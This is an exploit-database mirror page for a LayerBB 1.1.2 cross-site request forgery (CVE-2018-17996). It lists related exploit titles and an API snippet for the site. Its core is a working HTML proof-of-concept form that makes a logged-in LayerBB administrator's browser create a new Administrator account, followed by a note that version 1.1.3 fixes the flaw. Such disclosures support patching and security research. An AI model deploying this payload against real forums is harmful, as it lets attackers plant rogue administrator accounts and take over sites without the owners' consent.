Menu

Improved exploit search engine. Try it out

"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)"

Author

0xB9

Platform

php

Release date

2019-02-14

Release Date Title Type Platform Author
2019-04-22 "UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting" webapps php "Kağan EĞLENCE"
2019-04-22 "Msvod 10 - Cross-Site Request Forgery (Change User Information)" webapps php ax8
2019-04-22 "74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)" webapps php ax8
2019-04-22 "WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion" webapps php "Panagiotis Vagenas"
2019-04-16 "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion" webapps php "Haboob Team"
2019-04-15 "DirectAdmin 1.561 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-04-15 "CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)" remote php AkkuS
2019-04-12 "ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)" webapps php AkkuS
2019-04-10 "Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution" webapps php "Julien Ahrens"
2019-04-09 "Ashop Shopping Cart Software - 'bannedcustomers.php?blacklistitemid' SQL Injection" webapps php "Doğukan Karaciğer"
2019-02-27 "PHP 7.2 - 'imagecolormatch()' Out of Band Heap Write" remote php cfreal
2019-04-08 "WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass" webapps php isdampe
2019-04-08 "Tradebox CryptoCurrency - 'symbol' SQL Injection" webapps php "Abdullah Çelebi"
2019-04-08 "ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities" webapps php Ramikan
2019-04-08 "Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution" webapps php FelipeGaspar
2019-04-08 "Jobgator - 'experience' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-05 "WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery" webapps php "Peyman Forouzan"
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-04 "FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)" webapps php "Yilmaz Degirmenci"
2019-04-03 "PhreeBooks ERP 5.2.3 - Arbitrary File Upload" webapps php "Abdullah Çelebi"
2019-04-03 "Ashop Shopping Cart Software - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "Clinic Pro v4 - 'month' SQL Injection" webapps php "Abdullah Çelebi"
2019-04-03 "iScripts ReserveLogic - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)" remote php AkkuS
2019-04-02 "phpFileManager 1.7.8 - Local File Inclusion" webapps php "Murat Kalafatoglu"
2019-04-02 "Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting" webapps php "Mr Winst0n"
2019-04-02 "CMS Made Simple < 2.2.10 - SQL Injection" webapps php "Daniele Scanu"
2019-04-02 "LimeSurvey < 3.16 - Remote Code Execution" webapps php q3rv0
2019-04-02 "WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 - Parameter Tampering" webapps php "Vikas Chaudhary"
2019-04-02 "Inout RealEstate - 'city' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
Release Date Title Type Platform Author
2019-03-19 "MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting" webapps php 0xB9
2019-02-15 "MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 0xB9
2019-02-14 "LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)" webapps php 0xB9
2019-02-15 "VSCO 1.1.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-02-12 "LayerBB 1.1.2 - Cross-Site Scripting" webapps php 0xB9
2019-02-11 "MyBB Bans List 1.0 - Cross-Site Scripting" webapps php 0xB9
2019-01-28 "MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting" webapps php 0xB9
2019-01-28 "Smart VPN 1.1.3.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "FastTube 1.0.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "VPN Browser+ 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "7 Tik 1.0.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "Eco Search 1.0.2.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "One Search 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "Watchr 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-07 "MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting" webapps php 0xB9
2019-01-07 "LayerBB 1.1.1 - Persistent Cross-Site Scripting" webapps php 0xB9
2018-09-12 "MyBB 1.8.17 - Cross-Site Scripting" webapps php 0xB9
2018-08-20 "MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery" webapps php 0xB9
2018-08-10 "MyBB Like Plugin 3.0.0 - Cross-Site Scripting" webapps php 0xB9
2018-07-19 "MyBB New Threads Plugin 1.1 - Cross-Site Scripting" webapps php 0xB9
2018-08-10 "MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting" webapps php 0xB9
2018-06-05 "MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting" webapps php 0xB9
2018-05-29 "MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting" webapps php 0xB9
2018-05-25 "MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Scripting" webapps php 0xB9
2018-05-16 "MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery" webapps php 0xB9
2018-05-10 "MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting" webapps php 0xB9
2018-04-26 "MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting" webapps php 0xB9
2018-04-26 "October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting" webapps php 0xB9
2018-04-05 "MyBB Plugin Downloads 2.0.3 - Cross-Site Scripting" webapps php 0xB9
2018-03-23 "MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting" webapps php 0xB9
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46379/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46379/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46379/40851/layerbb-112-cross-site-request-forgery-add-admin/download/", "exploit_id": "46379", "exploit_description": "\"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)\"", "exploit_date": "2019-02-14", "exploit_author": "0xB9", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery
# Date: 10/4/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com
# Version: 1.1.2
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-17996


1. Description:
LayerBB is a free open-source forum software, the CSRF allows creating a admin user.
 

2. Proof of Concept:

<!-- Create Admin User -->  
<html>
  <body>
	<form action="http://localhost/[path]/admin/new_user.php" method="POST">
        <label for="username">Username</label>
        <input name="username" id="username" value="test" type="text">
        <label for="password">Password</label>
        <input name="password" id="password" value="password123" type="password">
        <label for="email">Email Address</label>
        <input name="email" id="email" value="test@localhost.co" type="text">               
        <label for="usergroup">Usergroup</label><br>
        <select name="usergroup" id="usergroup" style="width:100%;"><option value="4">Administrator</option></select><br><br>
        <input name="create" value="Create User" type="submit">
    </form>
  </body>
</html>
<!-- Create Admin User End -->


3. Solution:
Update to 1.1.3